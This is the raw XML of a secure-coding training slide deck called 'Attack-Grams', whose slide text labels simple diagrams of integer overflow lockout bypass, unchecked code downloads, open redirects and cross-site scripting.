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notesSlides/_rels/notesSlide11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1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presPro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23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide15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2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2.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide20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5.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide23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16.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships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media/image28.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image29.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image22.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image27.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image19.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image36.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image26.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image18.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image35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20.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image21.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image8.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image13.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image30.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image10.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image9.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image37.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image38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4.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image31.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image23.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image15.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image32.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image24.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image16.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image33.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image25.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image17.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image3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ed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6804A315-D1B9-4482-AD1C-54031050391C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8E56542-2159-4C93-BA75-730219B9F43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9FC55EC-E6CB-4E17-B7F1-BBC6BB23721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B3D2EB9-0451-4DB2-BFD8-076855EE08D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1EE9A58-0212-49DE-88A3-1B6D11F2CF4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24312DE-EC5F-4146-8BFC-6C69F10C960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A6E08A6-8A51-4BE4-BB7F-85B04AAF401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934F9CF-08D8-4FD0-AFE2-61440AF74A8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2E8A506-DE68-41BB-B5A3-E8CC6DF70F1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2B758D0-74E6-4FC3-8007-ECA141A9A41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B72DFC3-770A-4762-BE1E-08DA473989F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C6CAAF9-CA83-4988-B853-F72EF3BF1F8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56C6027-835A-447F-974C-945CFEB2832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F28A086-2101-4254-AC39-BD045BDB1D5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1120CE4-A231-4A2A-B14E-9B308A4228C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C5D57DF-B57B-47FD-81EF-91FFC764CA7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2702DAC-32BA-4A46-BF08-511BF4BECAD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23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image" Target="../media/image22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2.wmf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2.wmf"/><Relationship Id="rId7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22.wmf"/><Relationship Id="rId7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2.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId10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2.wmf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2.wmf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4.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId10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png"/><Relationship Id="rId2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38.png"/><Relationship Id="rId8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2.wmf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2.wmf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.wmf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image" Target="../media/image22.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.wmf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5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50600" y="678240"/>
            <a:ext cx="10515240" cy="2145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7000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="6600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff">
                    <a:alpha val="79000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;Secure Coding Dojo/&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="6600"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="6600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff">
                    <a:alpha val="79000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>Attack-Grams</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6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Title 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750600" y="3247200"/>
            <a:ext cx="1110492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ffffff">
                    <a:alpha val="58000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>A set of simple diagrams describing various attacks that leverage software flaws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2253600" y="48420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Integer Overflow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8" name="Picture 3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3661920" y="1646640"/>
            <a:ext cx="718200" cy="872640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3551760" y="2519280"/>
            <a:ext cx="815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0" name="Graphic 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914040" y="1606680"/>
            <a:ext cx="952200" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="813600" y="2530800"/>
            <a:ext cx="1136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2" name="Straight Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278360" y="2851920"/>
            <a:ext cx="9000" cy="3192480"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="a5a5a5"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="193" name="Straight Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3908880" y="2854800"/>
            <a:ext cx="9000" cy="3189600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="a5a5a5"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="194" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278360" y="3233880"/>
            <a:ext cx="2630880" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277000" y="2904480"/>
            <a:ext cx="1474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Credentials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6" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1270080" y="3248640"/>
            <a:ext cx="2647800" cy="853920"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="4472c4"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="TextBox 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20570400">
            <a:off x="1086480" y="3517560"/>
            <a:ext cx="2064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Account Locked!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8" name="Straight Arrow Connector 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270800" y="4127040"/>
            <a:ext cx="2647080" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277000" y="3800880"/>
            <a:ext cx="1474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Credentials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00" name="Straight Arrow Connector 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1269360" y="4158000"/>
            <a:ext cx="2639880" cy="868680"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="4472c4"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20563200">
            <a:off x="1086120" y="4420080"/>
            <a:ext cx="2064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Account Locked!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Box 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2392200" y="2512440"/>
            <a:ext cx="372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03" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1287000" y="5034960"/>
            <a:ext cx="2630880" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="TextBox 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277000" y="4698360"/>
            <a:ext cx="1474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Credentials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05" name="Straight Arrow Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1269360" y="5080680"/>
            <a:ext cx="2639880" cy="768240"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="70ad47"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="TextBox 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20638200">
            <a:off x="1038960" y="5279760"/>
            <a:ext cx="2185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Login authorized!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Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3902040" y="3942720"/>
            <a:ext cx="3934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Helvetica Neue"/>
              </a:rPr>
              <a:t>attempts = 32767 (MAX_SHORT)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Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3881880" y="4850640"/>
            <a:ext cx="4681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a94442"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>attempts = -32768 (&lt; MAX_ATTEMPTS)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Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3980520" y="3054240"/>
            <a:ext cx="2278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Helvetica Neue"/>
              </a:rPr>
              <a:t>attempts = 32766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Curved Connector 37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="211" idx="1"/>
            <a:endCxn id="212" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116080" y="2158920"/>
            <a:ext cx="360" cy="3012480"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 56300000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="123825">
            <a:solidFill>
              <a:srgbClr val="e7e6e6">
                <a:lumMod val="50000"/>
                <a:alpha val="31000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp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51040" y="59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Download of Code Without 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Integrity Check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Cube 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1245600" y="1602720"/>
            <a:ext cx="870120" cy="1330200"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst>
              <a:gd name="adj" fmla="val 25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14" name="Picture 5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3555720" y="1881360"/>
            <a:ext cx="718200" cy="872640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="215" name="Graphic 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163880" y="4695120"/>
            <a:ext cx="952200" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289520" y="5654160"/>
            <a:ext cx="700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TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3318120" y="2754360"/>
            <a:ext cx="1186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Software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Graphic 17" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4411800" y="3188880"/>
            <a:ext cx="952200" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="219" name="Picture 19" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3555720" y="4478400"/>
            <a:ext cx="718200" cy="925920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3342960" y="5325840"/>
            <a:ext cx="1136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Malware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TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797040" y="2940120"/>
            <a:ext cx="2214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Download Server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(Not Secure)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TextBox 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377680" y="3300480"/>
            <a:ext cx="95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Man-in-the-middle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1676520" y="568800"/>
            <a:ext cx="10515240" cy="54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Open Redirect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4" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4230360" y="1460160"/>
            <a:ext cx="718200" cy="925920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="225" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507320" y="1431720"/>
            <a:ext cx="718200" cy="872640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915120" y="2275200"/>
            <a:ext cx="1950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www.trusted.good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TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840120" y="2331000"/>
            <a:ext cx="1507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www.evil.bad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8" name="Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4230360" y="3651840"/>
            <a:ext cx="952200" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="229" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1259280" y="3469680"/>
            <a:ext cx="1769040" cy="1498320"/>
            <a:chOff x="1259280" y="3469680"/>
            <a:chExt cx="1769040" cy="1498320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="230" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1410480" y="346968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1" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1746000" y="365292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2" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1259280" y="4604040"/>
              <a:ext cx="17690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33" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4181400" y="4604040"/>
            <a:ext cx="1050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34" name="Curved Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="230" idx="0"/>
            <a:endCxn id="226" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="1609920" y="3189600"/>
            <a:ext cx="556560" cy="4320"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24983"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="235" name="Curved Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="226" idx="2"/>
            <a:endCxn id="224" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="2565000" y="1248120"/>
            <a:ext cx="990720" cy="2340360"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -17884"/>
              <a:gd name="adj2" fmla="val 49492"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="236" name="Curved Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="228" idx="1"/>
            <a:endCxn id="231" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="10800000">
            <a:off x="2698200" y="4127400"/>
            <a:ext cx="1532520" cy="1440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3002040" y="4183560"/>
            <a:ext cx="10432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Phishing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E-mail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Graphic 27" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3192480" y="3596040"/>
            <a:ext cx="531720" cy="53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Curved Connector 40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="240" idx="1"/>
            <a:endCxn id="241" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="10800000">
            <a:off x="3121560" y="2850840"/>
            <a:ext cx="852120" cy="1601280"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="242" name="Picture 6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3228480" y="1512360"/>
            <a:ext cx="1605240" cy="1950120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic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1233000" y="523440"/>
            <a:ext cx="10515240" cy="54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Cross-Site Scripting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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3192480" y="1228320"/>
            <a:ext cx="1950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www.trusted.good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" name="Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005800" y="4450680"/>
            <a:ext cx="952200" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="246" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2158920" y="4268520"/>
            <a:ext cx="1769040" cy="1498680"/>
            <a:chOff x="2158920" y="4268520"/>
            <a:chExt cx="1769040" cy="1498680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="247" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2310120" y="426852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8" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2645640" y="445212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9" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2158920" y="5403240"/>
              <a:ext cx="17690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50" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956840" y="5403240"/>
            <a:ext cx="1050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51" name="Curved Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="245" idx="0"/>
            <a:endCxn id="240" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="4212360" y="3180960"/>
            <a:ext cx="1599840" cy="939960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="252" name="Graphic 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="0" t="50877" r="83807" b="0"/>
          <a:stretch/>
        </p:blipFill>
